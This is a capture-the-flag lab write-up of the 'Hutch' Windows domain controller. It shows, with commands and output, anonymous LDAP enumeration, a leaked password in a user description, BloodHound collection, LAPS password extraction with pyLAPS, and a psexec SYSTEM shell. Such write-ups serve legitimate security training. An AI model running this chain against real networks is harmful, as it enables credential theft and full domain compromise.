Machine Information
- Machine Name: Hutch
- Machine Difficulty: Intermediate
Information Gathering
Classic nmap time
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
Nmap scan report for 192.168.135.122
Host is up, received user-set (0.013s latency).
Scanned at 2024-10-19 15:54:28 +08 for 202s
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 125 Simple DNS Plus
80/tcp open http syn-ack ttl 125 Microsoft IIS httpd 10.0
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
|_ Potentially risky methods: TRACE COPY PROPFIND DELETE MOVE PROPPATCH MKCOL LOCK UNLOCK PUT
| http-webdav-scan:
| Public Options: OPTIONS, TRACE, GET, HEAD, POST, PROPFIND, PROPPATCH, MKCOL, PUT, DELETE, COPY, MOVE, LOCK, UNLOCK
| Server Type: Microsoft-IIS/10.0
| WebDAV type: Unknown
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, POST, COPY, PROPFIND, DELETE, MOVE, PROPPATCH, MKCOL, LOCK, UNLOCK
|_ Server Date: Sat, 19 Oct 2024 07:57:09 GMT
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-10-19 07:56:09Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49668/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49676/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49692/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49768/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
I started with port 80 but I could not find anything useful. So I decided to enumerate ldap first.
Port 389
I’ll be using netexec to enumerate ldap as I don’t know how to use ldapsearch.
1
2
3
netexec ldap 192.168.135.122 -u "" -p ""
SMB 192.168.135.122 445 HUTCHDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP 192.168.135.122 389 HUTCHDC [+] hutch.offsec\:
So ldap allow login without credentials so I could get some useful information here.
1
2
3
4
5
6
netexec ldap 192.168.135.122 -u "" -p "" -M get-desc-users
SMB 192.168.135.122 445 HUTCHDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP 192.168.135.122 389 HUTCHDC [+] hutch.offsec\:
GET-DESC... 192.168.135.122 389 HUTCHDC [+] Found following users:
GET-DESC... 192.168.135.122 389 HUTCHDC User: Guest description: Built-in account for guest access to the computer/domain
GET-DESC... 192.168.135.122 389 HUTCHDC User: fmcsorley description: Password set to CrabSharkJellyfish192 at user's request. Please change on next login.
After searching for useful information, I noticed that’s a password provided here. Time to check if the password actually works.
1
2
3
netexec ldap 192.168.135.122 -u fmcsorley -p CrabSharkJellyfish192
SMB 192.168.135.122 445 HUTCHDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
LDAP 192.168.135.122 389 HUTCHDC [+] hutch.offsec\fmcsorley:CrabSharkJellyfish192
The credential actually works so I just run bloodhound-python to have a overview with the active directory.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
bloodhound-python -d 'hutch.offsec' -u fmcsorley -p CrabSharkJellyfish192 -ns 192.168.135.122 -c All --zip
INFO: Found AD domain: hutch.offsec
INFO: Getting TGT for user
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: hutchdc.hutch.offsec
INFO: Found 18 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: hutchdc.hutch.offsec
INFO: Done in 00M 03S
INFO: Compressing output into 20241019202639_bloodhound.zip
After getting the zip file, import to bloodhound and have a quick look.
It seems like the current user that I have has ReadLAPSPassword permission. According to the bloodhound, the ReadLAPSPassword permission allows me to read the password set by LAPS and local administrator password is managed by LAPS. This means that I could just get local administrator password with the permission. To get the password, bloodhound suggested me to use pyLAPS.py.
1
2
3
4
5
6
7
8
9
10
11
python pyLAPS/pyLAPS.py --action get -d "hutch.offsec" -u "fmcsorley" -p "CrabSharkJellyfish192" --dc-ip 192.168.135.122
__ ___ ____ _____
____ __ __/ / / | / __ \/ ___/
/ __ \/ / / / / / /| | / /_/ /\__ \
/ /_/ / /_/ / /___/ ___ |/ ____/___/ /
/ .___/\__, /_____/_/ |_/_/ /____/ v1.2
/_/ /____/ @podalirius_
[+] Extracting LAPS passwords of all computers ...
| HUTCHDC$ : 95X,%O(]0b1@88
[+] All done!
I then try if I have access to local administrator using netexec.
1
2
3
netexec smb 192.168.135.122 -u administrator -p '95X,%O(]0b1@88'
SMB 192.168.135.122 445 HUTCHDC [*] Windows 10 / Server 2019 Build 17763 x64 (name:HUTCHDC) (domain:hutch.offsec) (signing:True) (SMBv1:False)
SMB 192.168.135.122 445 HUTCHDC [+] hutch.offsec\administrator:95X,%O(]0b1@88 (Pwn3d!)
It’s a Pwn3d! directly for smb services. This means that I could just get administrator shell.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
impacket-psexec hutch.offsec/Administrator:'95X,%O(]0b1@88'@192.168.135.122
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Requesting shares on 192.168.135.122.....
[*] Found writable share ADMIN$
[*] Uploading file LSgJnLEi.exe
[*] Opening SVCManager on 192.168.135.122.....
[*] Creating service CcoV on 192.168.135.122.....
[*] Starting service CcoV.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1637]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32> whoami
nt authority\system
With that, I easily get administrator shell without the need of privilege escalation.
Things that I learned from this machine
- ldap anonymous enumeration using
netexec ReadLAPSPasswordto get password